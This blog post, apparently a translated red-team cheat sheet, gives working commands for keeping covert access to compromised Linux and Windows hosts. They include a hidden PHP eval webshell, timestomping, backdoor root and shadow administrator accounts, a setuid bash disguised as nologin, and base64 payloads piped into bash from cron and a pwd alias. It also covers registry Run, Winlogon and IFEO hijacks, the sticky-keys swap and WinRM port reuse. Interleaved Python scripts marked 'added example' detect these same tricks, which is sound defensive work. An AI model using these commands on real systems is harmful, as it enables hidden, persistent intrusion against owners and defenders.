Persistence


File Hiding

Linux

  • Hiding content
# the \r moves the cursor back to column 0 and the 50 spaces overwrite the shell when the file is viewed with cat; cat -A or xxd still shows it
printf "<?=@eval(\$_REQUEST['code']);?>\r%-50s\n" > backup.php
  • File timestamps
# copy atime/mtime from a legitimate file or set them explicitly; touch cannot change ctime
touch -r index.php backup.php
touch -t 201406121017.34 backup.php
  • File locking
# immutable bit: the file cannot be modified, renamed or deleted until chattr -i is run with root privileges; lsattr shows the flag, ls does not
chattr +i backup.php
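
The padded-printf and touch tricks above are easy to verify in code. The following is an added example (my code, not from the original post): it reproduces the CR padding and the `touch -r` copy with Python's standard library, then shows the two checks a responder would run against a webroot, a scan for lines where a carriage return is followed only by whitespace, and a ctime-versus-mtime comparison, since `touch` cannot rewrite ctime. The file names, the sample index.php and its 2014 timestamp are constructed here.

```python
"""CR-padding detection and a timestomping indicator for dropped files.

Added example, not part of the original page.  The payload and the 50-column
padding mirror the printf one-liner above; file names and the sample index.php
are constructed here.
"""
import os
import tempfile

PAYLOAD = b"<?=@eval($_REQUEST['code']);?>"   # the webshell from the printf example
INDEX_MTIME = 1402568254                        # 2014-06-12 10:17:34 UTC, as in the touch -t example


def write_cr_padded(path: str, payload: bytes, width: int = 50) -> None:
    """Same bytes as `printf "<payload>\\r%-50s\\n" > path`: payload, CR, width spaces, LF."""
    with open(path, "wb") as f:
        f.write(payload + b"\r" + b" " * width + b"\n")


def find_cr_hidden(data: bytes) -> list:
    """Return [(line_no, hidden_bytes)] for lines where a bare CR is followed only
    by whitespace: the terminal shows blanks, the file holds `hidden_bytes`.
    A CR that merely ends the line (CRLF) is stripped first and never reported."""
    hits = []
    for no, line in enumerate(data.split(b"\n"), start=1):
        if line.endswith(b"\r"):
            line = line[:-1]
        if b"\r" not in line:
            continue
        hidden, tail = line.rsplit(b"\r", 1)
        if tail.strip() == b"":
            hits.append((no, hidden))
    return hits


def clone_mtime(src: str, dst: str) -> None:
    """Equivalent of `touch -r src dst`: copies atime and mtime, nothing else."""
    st = os.stat(src)
    os.utime(dst, ns=(st.st_atime_ns, st.st_mtime_ns))


def timestomp_indicator(path: str, slack: float = 86400.0) -> bool:
    """True when ctime is more than `slack` seconds newer than mtime.

    touch cannot set ctime, so a file dropped today with mtime copied from an old
    neighbour keeps a ctime of 'now'.  Heuristic only: chmod, chown and cp -p
    also leave ctime > mtime, so use it to rank files in a webroot, not to convict."""
    st = os.stat(path)
    return st.st_ctime - st.st_mtime > slack


def demo() -> dict:
    """Drop backup.php next to an 'old' index.php in a temp dir and run both checks."""
    with tempfile.TemporaryDirectory() as d:
        index = os.path.join(d, "index.php")
        backup = os.path.join(d, "backup.php")
        with open(index, "wb") as f:
            f.write(b"<?php echo 'hello'; ?>\n")          # constructed legitimate file
        os.utime(index, (INDEX_MTIME, INDEX_MTIME))
        write_cr_padded(backup, PAYLOAD)                   # printf ... > backup.php
        clone_mtime(index, backup)                         # touch -r index.php backup.php
        with open(backup, "rb") as f:
            hidden = find_cr_hidden(f.read())
        return {
            "hidden": hidden,
            "mtime_match": os.stat(index).st_mtime_ns == os.stat(backup).st_mtime_ns,
            "backup_stomped": timestomp_indicator(backup),
        }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```

`find_cr_hidden` skips plain CRLF endings so Windows-edited files do not flood the output, and `timestomp_indicator` is a ranking signal rather than proof, because chmod and cp -p also bump ctime. The immutable bit set by `chattr +i` is visible in `lsattr` output, not in `stat`.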

Windows

  • File hiding
# system+hidden attributes keep the file out of dir output unless /a is used
attrib +s +a +h +r D:\PHPStudy\WWW\backup.php
  • ADS hiding
# after XP a file stored in an alternate data stream cannot be executed directly
echo ^<?=@eval($_REQUEST['code']);?^> > index.php:mm
  • File timestamps
# PowerShell
(ls backup.php).CreationTime='2014-06-12 10:17:34'
(ls backup.php).LastWriteTime='2014-06-12 10:17:34'
(ls backup.php).LastAccessTime='2014-06-12 10:17:34'

User Management

Linux

  • Regular account
# replace nologin with a setuid copy of bash: the account looks disabled in /etc/passwd but logs in with euid 0
cp /bin/bash /bin/nologin && chmod u+s /bin/nologin
sed -i "17i\usr:x:40:40:usr:/usr/sbin:/bin/nologin" /etc/passwd
sed -i "17i\usr:$(openssl passwd -1 admin@888..):18375:0:99999:7:::" /etc/shadow
# -p makes bash keep the effective uid granted by the setuid bit
ssh usr@x.x.x.x -o UserKnownHostsFile=/dev/null -T /bin/nologin -ip
  • System account
ln -s /bin/bash /bin/nologin
sed -i "3i\usr:x:0:0:usr:/usr/sbin:/bin/nologin" /etc/passwd
sed -i "3i\usr:$(openssl passwd -1 admin@888..):18375:0:99999:7:::" /etc/shadow
  • Key-based login
ssh-keygen -t rsa -f rsa_key -C flag
# the password field is locked (*), so only the key works; cap_setuid on python gives the uid-40 user a way back to root
ln -s /bin/bash /bin/nologin && setcap cap_setuid+ep /bin/python
sed -i "17i\usr:x:40:40:usr:/usr/sbin:/bin/nologin" /etc/passwd
sed -i "17i\usr:*:18375:0:99999:7:::" /etc/shadow
# "rsa" stands for the contents of rsa_key.pub
mkdir /usr/sbin/.ssh && echo "rsa" > /usr/sbin/.ssh/authorized_keys
python -c "import os, pty; os.setuid(0); pty.spawn('/bin/bash')"
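
An added audit (my code, not part of the original page) for the account tricks above: it parses passwd and shadow text and flags uid-0 accounts other than root, a nologin shell that is really a symlink to bash, a setuid login shell, system accounts that carry a usable hash, and locked accounts whose home directory holds an authorized_keys file. The `root` parameter resolves shells and homes under a prefix so the audit can run against a mounted disk image; `demo()` builds a throwaway fixture that mirrors the snippets above. The account names, the placeholder hash and the fixture layout are constructed.

```python
"""Audit passwd/shadow for the nologin/setuid/uid-0/authorized_keys tricks above.

Added example, not part of the original page.  Account names, the fake hash and
the directory layout built by demo() are constructed; `root` lets the audit run
against a mounted image (or the fixture) instead of the live system.
"""
import os
import stat
import tempfile
from dataclasses import dataclass

NOLOGIN_NAMES = {"nologin", "false"}

# constructed /etc/passwd and /etc/shadow excerpts; the hash is a placeholder string
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
usr:x:40:40:usr:/usr/sbin:/bin/nologin
usr2:x:0:0:usr2:/usr/sbin:/sbin/nologin
svc:x:41:41:svc:/usr/sbin:/bin/nologin
"""
SAMPLE_SHADOW = """root:$1$saltsalt$placeholderhashvalue00:18375:0:99999:7:::
daemon:*:18375:0:99999:7:::
usr:$1$saltsalt$placeholderhashvalue00:18375:0:99999:7:::
usr2:$1$saltsalt$placeholderhashvalue00:18375:0:99999:7:::
svc:*:18375:0:99999:7:::
"""


@dataclass
class Account:
    name: str
    uid: int
    gid: int
    home: str
    shell: str


def parse_passwd(text: str) -> list:
    out = []
    for line in text.splitlines():
        if line and not line.startswith("#"):
            name, _pw, uid, gid, _gecos, home, shell = line.split(":", 6)
            out.append(Account(name, int(uid), int(gid), home, shell))
    return out


def parse_shadow(text: str) -> dict:
    """name -> password field: '*', '!', '!!' or '' mean locked, anything else is a hash."""
    return {ln.split(":")[0]: ln.split(":")[1] for ln in text.splitlines() if ":" in ln}


def _under(root: str, path: str) -> str:
    return os.path.join(root, path.lstrip("/"))


def audit_accounts(passwd_text: str, shadow_text: str, root: str = "/") -> list:
    shadow = parse_shadow(shadow_text)
    findings = []
    for a in parse_passwd(passwd_text):
        pw = shadow.get(a.name, "")
        usable_pw = bool(pw) and pw[0] not in "*!"
        if a.uid == 0 and a.name != "root":
            findings.append(f"{a.name}: uid 0 but not root")
        shell = _under(root, a.shell)
        if os.path.basename(a.shell) in NOLOGIN_NAMES and os.path.islink(shell):
            target = os.path.basename(os.path.realpath(shell))
            if target not in NOLOGIN_NAMES:          # ln -s /bin/bash /bin/nologin
                findings.append(f"{a.name}: shell {a.shell} is a symlink to {target}")
        if os.path.isfile(shell) and os.stat(shell).st_mode & stat.S_ISUID:
            findings.append(f"{a.name}: login shell {a.shell} is setuid")   # cp bash + chmod u+s
        if a.uid < 1000 and a.name != "root" and usable_pw:
            findings.append(f"{a.name}: system account has a usable password hash")
        keys = _under(root, os.path.join(a.home, ".ssh", "authorized_keys"))
        if a.name != "root" and not usable_pw and os.path.isfile(keys):
            # a locked password does not stop pubkey auth, and a shared system home
            # such as /usr/sbin makes the key valid for every account living there
            findings.append(f"{a.name}: locked password but authorized_keys under {a.home}")
    return findings


def demo() -> list:
    """Build a tiny fake root reproducing the snippets above and audit it."""
    with tempfile.TemporaryDirectory() as root:
        for d in ("/bin", "/sbin", "/usr/sbin/.ssh"):
            os.makedirs(_under(root, d))
        bash = _under(root, "/bin/bash")
        with open(bash, "wb") as f:
            f.write(b"#!/bin/sh\n")                        # stand-in for the real binary
        os.chmod(bash, 0o755)
        os.symlink(bash, _under(root, "/bin/nologin"))    # ln -s /bin/bash /bin/nologin
        fake = _under(root, "/sbin/nologin")
        with open(fake, "wb") as f:
            f.write(b"#!/bin/sh\n")
        os.chmod(fake, 0o4755)                             # cp /bin/bash ... && chmod u+s
        with open(_under(root, "/usr/sbin/.ssh/authorized_keys"), "w") as f:
            f.write("ssh-rsa AAAAB3NzaC1yc2E... flag\n")   # constructed key line
        return audit_accounts(SAMPLE_PASSWD, SAMPLE_SHADOW, root)


if __name__ == "__main__":
    print("\n".join(demo()))
```

On a live host run `audit_accounts(open('/etc/passwd').read(), open('/etc/shadow').read())` as root. The home-directory check also flags every other system account that shares `/usr/sbin` with the planted one, which is intended: sshd reads the key file relative to the home directory in passwd, so any account with that home accepts the key. File capabilities such as the `cap_setuid` on python are not visible in passwd; `getcap -r / 2>/dev/null` lists them.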

Windows

  • Shadow account
#https://github.com/Ridter/Pentest/blob/master/powershell/MyShell/Create-Clone.ps1
# the trailing $ keeps the account out of net user output; -cu names the account whose SAM data is cloned
powershell -exec bypass -Command "Import-Module .\Create-Clone.ps1; Create-Clone -u 'usr$' -p 'admin@888..' -cu Administrator"
  • Guest account
net user guest admin@888..
net user guest /active:yes
net localgroup administrators guest /add
  • VBS script
# usage: cscript script.vbs <username> <password>; pass GUEST to re-enable the built-in account instead of creating one
UserName = WScript.Arguments(0)
PassWord = WScript.Arguments(1)
' ADSI WinNT provider bound to the local machine
WinNT = "WinNT://" & CreateObject("WScript.Network").ComputerName
Set Admin = GetObject(WinNT & "/Administrators,group")
If UCase(UserName) = "GUEST" Then
    ' reuse the built-in Guest account
    Set User = GetObject(WinNT & "/Guest,user")
    User.AccountDisabled = False
Else
    Set User = GetObject(WinNT).Create("User", UserName)
End If
User.SetPassword PassWord
User.SetInfo
Admin.Add WinNT & "/" & UserName

Autostart

Linux

  • Startup scripts
/etc/bashrc
/etc/profile
/etc/profile.d/*
/etc/rc.d/init.d/*
/etc/rc.d/rc.local
  • Scheduled tasks
# $i inserts before the last line of /etc/crontab; the \r plus 80 spaces hides the entry from cat (d2hvYW1pCg== is base64 for whoami)
# note that the CR is glued to the redirect target, so bash writes to a file named "null<CR>" in /dev rather than to /dev/null
sed -i "\$i\\$(printf '59 23   * * *   root    echo d2hvYW1pCg== | base64 -d | bash &> /dev/null\r%-80s\n')" /etc/crontab
# /etc/cron.hourly -- hourly, /etc/cron.daily -- daily, /etc/cron.weekly -- weekly, /etc/cron.monthly -- monthly
# a shebang is added so run-parts can exec the file directly; &> is bash syntax
printf '#!/bin/bash\necho d2hvYW1pCg== | base64 -d | bash &> /dev/null\r%-50s\n' > /etc/cron.daily/default && chmod 755 /etc/cron.daily/default

Windows

  • Registry
# "Shell" stands for the program to launch throughout this section
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v StartUp /t REG_SZ /d "Shell" /f
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v StartUp /t REG_SZ /d "Shell" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v StartUp /t REG_SZ /d "Shell" /f
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v StartUp /t REG_SZ /d "Shell" /f
  • Logon scripts
# UserInitMprLogonScript runs at logon without any GPO; Shell and Userinit keep the legitimate binary first so the logon still looks normal
reg add "HKCU\Environment" /v UserInitMprLogonScript /t REG_SZ /d "C:\Users\Public\Shell" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "explorer.exe,Shell" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Windows\System32\userinit.exe,Shell" /f
  • Startup folders
# before NT 6 (XP / Server 2003)
C:\Documents and Settings\All Users\Start Menu\Programs\StartUp
C:\Documents and Settings\%UserName%\Start Menu\Programs\StartUp
# NT 6 and later
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
C:\Users\%UserName%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
  • System service
# the description imitates a built-in service
sc create StartUp binPath= "Shell" start= "delayed-auto" obj= "LocalSystem"
sc description StartUp "Performs security checks when applications start."
  • Scheduled task
# onStart -- at system boot, onLogon -- at user logon
schtasks /Create /tn "\Microsoft\Windows\StartUp\StartUp" /ru SYSTEM /sc onStart /tr "Shell"

Process Hijacking

Linux

  • alias backdoor
# the trailing # keeps the CR padding out of the alias value, so pwd itself still works; %-70s is wide enough to cover the visible line
printf "alias pwd='\$(echo d2hvYW1pCg== | base64 -d | bash &> /dev/null)pwd' #\r%-70s\n" >> ~/.bashrc && source ~/.bashrc

Windows

  • DLL hijacking

  • File replacement
# sticky-keys backdoor: pressing Shift five times at the logon screen starts sethc.exe as SYSTEM
takeown /A /F C:\Windows\System32\sethc.exe
cacls C:\Windows\System32\sethc.exe /E /G Everyone:F
cd C:\Windows\System32 && move sethc.exe sethc.bak && copy odbcad32.exe sethc.exe
  • Image hijacking
# executed directly: the Debugger is started instead of sethc.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\odbcad32.exe" /f
# executed on silent exit: MonitorProcess runs when sethc.exe exits; GlobalFlag 0x200 (512) arms the monitoring
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\sethc.exe" /v ReportingMode /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\sethc.exe" /v MonitorProcess /t REG_SZ /d "Shell" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v GlobalFlag /t REG_DWORD /d 512 /f
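
The scheduled-task entries in the Autostart section and the alias backdoor above share one shape: a base64 blob decoded and piped into a shell, padded with a carriage return so that `cat` shows an empty line. As an added example (mine, not from the original post), the scanner below reads crontab or shell-startup text, flags embedded CRs and aliases that run a command substitution, and decodes the blob so an analyst sees `whoami` instead of `d2hvYW1pCg==`. The sample crontab and .bashrc content is constructed to match the snippets on this page, and the regex is mine.

```python
"""Surface encoded one-liners hidden in cron and shell-startup files.

Added example, not part of the original page.  The crontab and .bashrc text
below is constructed to match the sed/printf/alias snippets above; the regex is
mine and targets the `echo <b64> | base64 -d | <shell>` shape they all use.
"""
import base64
import binascii
import re
from typing import Optional

B64_PIPE = re.compile(
    r"echo\s+(?:-n\s+)?['\"]?([A-Za-z0-9+/=]{8,})['\"]?\s*\|\s*"
    r"base64\s+(?:-d|--decode)\s*\|\s*(?:ba|z|da)?sh\b"
)
ALIAS_DEF = re.compile(r"^\s*alias\s+([\w.-]+)=(.*)$")

SAMPLE_CRONTAB = (
    "SHELL=/bin/bash\n"
    "PATH=/sbin:/bin:/usr/sbin:/usr/bin\n"
    "17 *\t* * *\troot    cd / && run-parts --report /etc/cron.hourly\n"
    "59 23   * * *   root    echo d2hvYW1pCg== | base64 -d | bash &> /dev/null\r" + " " * 80 + "\n"
)
SAMPLE_BASHRC = (
    "# ~/.bashrc\n"
    "alias ll='ls -alF'\n"
    "alias pwd='$(echo d2hvYW1pCg== | base64 -d | bash &> /dev/null)pwd' #\r" + " " * 70 + "\n"
)


def decode_payload(b64: str) -> Optional[str]:
    """Strictly decode a base64 blob; None when it is not valid base64."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def scan_startup_text(text: str, source: str) -> list:
    """Return one dict per suspicious line: {source, line, flags, decoded}."""
    findings = []
    for no, raw in enumerate(text.split("\n"), start=1):
        line = raw.rstrip("\r")               # a CRLF ending alone is not suspicious
        flags, decoded = [], None
        if "\r" in line:
            flags.append("embedded CR: padding hides the rest of the line from cat")
        m = B64_PIPE.search(line)
        if m:
            decoded = decode_payload(m.group(1))
            flags.append("base64 blob piped into a shell")
        a = ALIAS_DEF.match(line)
        if a and ("$(" in a.group(2) or "`" in a.group(2)):
            flags.append(f"alias {a.group(1)} runs a command substitution before the real command")
        if flags:
            findings.append({"source": source, "line": no, "flags": flags, "decoded": decoded})
    return findings


if __name__ == "__main__":
    for hit in scan_startup_text(SAMPLE_CRONTAB, "/etc/crontab") + scan_startup_text(SAMPLE_BASHRC, "~/.bashrc"):
        print(hit)
```

On a single file `cat -A /etc/crontab` shows the same carriage return as `^M`; the scanner is for going through collected crontabs, cron.d drop-ins and dotfiles in bulk, and `B64_PIPE` is the place to add other decoders you meet.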
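
A reviewer checking a host for the registry persistence on this page (the Run, Winlogon and logon-script keys in the Autostart section and the IFEO and SilentProcessExit keys above) usually works from a `reg export` dump. The script below is an added example (my code, not from the original post): a small parser for that export format plus one check per key the `reg add` lines touch, including whether a SilentProcessExit monitor is actually armed by GlobalFlag 0x200. SAMPLE_REG is constructed to hold exactly the values written above plus one benign Run entry (SecurityHealth), so the output shows a normal entry next to the planted ones.

```python
"""Audit a `reg export` dump for the autostart and image-hijack keys above.

Added example, not part of the original page.  SAMPLE_REG is constructed to
contain the values the reg add lines write (plus one benign Run entry); the
parser handles REG_SZ and REG_DWORD lines, which is all those keys use.
"""

SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\system32\\SecurityHealthSystray.exe"
"StartUp"="Shell"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="explorer.exe,Shell"
"Userinit"="C:\\Windows\\System32\\userinit.exe,Shell"

[HKEY_CURRENT_USER\Environment]
"UserInitMprLogonScript"="C:\\Users\\Public\\Shell"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
"Debugger"="C:\\Windows\\System32\\odbcad32.exe"
"GlobalFlag"=dword:00000200

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\sethc.exe]
"ReportingMode"=dword:00000001
"MonitorProcess"="Shell"
"""

RUN_KEYS = ("currentversion\\run", "currentversion\\runonce")
FLG_MONITOR_SILENT_PROCESS_EXIT = 0x200   # the GlobalFlag bit the last reg add line sets (512)


def parse_reg(text: str) -> dict:
    """reg export text -> {lowercased key path: {lowercased value name: value}}.
    REG_SZ strings are unescaped, dword: values become int, anything else stays raw."""
    keys, cur = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            cur = line[1:-1].lower()
            keys[cur] = {}
        elif cur is not None and line.startswith('"') and '"=' in line:
            name, _, val = line.partition('"=')
            name = name[1:].lower()
            if val.startswith('"') and val.endswith('"'):
                keys[cur][name] = val[1:-1].replace('\\"', '"').replace("\\\\", "\\")
            elif val.lower().startswith("dword:"):
                keys[cur][name] = int(val[6:], 16)
            else:
                keys[cur][name] = val
    return keys


def _items(value: str) -> list:
    """Split a comma-separated Winlogon value into its non-empty, lowercased parts."""
    return [p.strip().lower() for p in value.split(",") if p.strip()]


def audit_registry(text: str) -> list:
    keys = parse_reg(text)
    findings = []
    for path, values in keys.items():
        exe = path.rsplit("\\", 1)[-1]
        if path.endswith(RUN_KEYS):
            for name, val in values.items():          # listed for review, not judged
                findings.append(f"autorun {path}\\{name} -> {val}")
        if path.endswith("currentversion\\winlogon"):
            if _items(str(values.get("shell", "explorer.exe"))) != ["explorer.exe"]:
                findings.append(f"Winlogon Shell = {values['shell']!r} (expected 'explorer.exe')")
            ui = _items(str(values.get("userinit", "c:\\windows\\system32\\userinit.exe,")))
            if ui != ["c:\\windows\\system32\\userinit.exe"]:
                findings.append(f"Winlogon Userinit = {values['userinit']!r} (expected only userinit.exe)")
        if path.endswith("\\environment") and "userinitmprlogonscript" in values:
            findings.append(f"UserInitMprLogonScript = {values['userinitmprlogonscript']} (runs at logon, no GPO needed)")
        if "\\image file execution options\\" in path and "debugger" in values:
            findings.append(f"IFEO debugger on {exe}: {values['debugger']}")
        if "\\silentprocessexit\\" in path and "monitorprocess" in values:
            # the monitor only fires if the matching IFEO key carries GlobalFlag 0x200
            ifeo = keys.get(path.replace("\\silentprocessexit\\", "\\image file execution options\\"), {})
            armed = bool(int(ifeo.get("globalflag", 0)) & FLG_MONITOR_SILENT_PROCESS_EXIT)
            state = "armed: GlobalFlag 0x200 set" if armed else "not armed: GlobalFlag 0x200 missing"
            findings.append(f"SilentProcessExit monitor on {exe}: {values['monitorprocess']} ({state})")
    return findings


if __name__ == "__main__":
    print("\n".join(audit_registry(SAMPLE_REG)))
```

Export the hive with `reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" out.reg` (and the HKCU keys separately) and feed the file to `audit_registry`. Run-key entries are listed rather than judged, since deciding whether `Shell` is malicious is the analyst's job; the Winlogon, IFEO and SilentProcessExit findings are deviations from the defaults and always deserve a look.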

Port Reuse

Linux

Windows

  • WinRM
# start WinRM
winrm quickconfig -q
# enable port sharing: the compatibility listener registers with HTTP.sys on port 80 next to IIS
winrm set winrm/config/Service @{EnableCompatibilityHttpListener="true"}
# change the listener port
winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port="80"}
# trust all hosts (client-side setting)
winrm set winrm/config/Client @{TrustedHosts="*"}

Author: DongHuangT1
Copyright: Unless otherwise stated, all posts on this blog are licensed under CC BY 4.0. Please credit DongHuangT1 when reposting.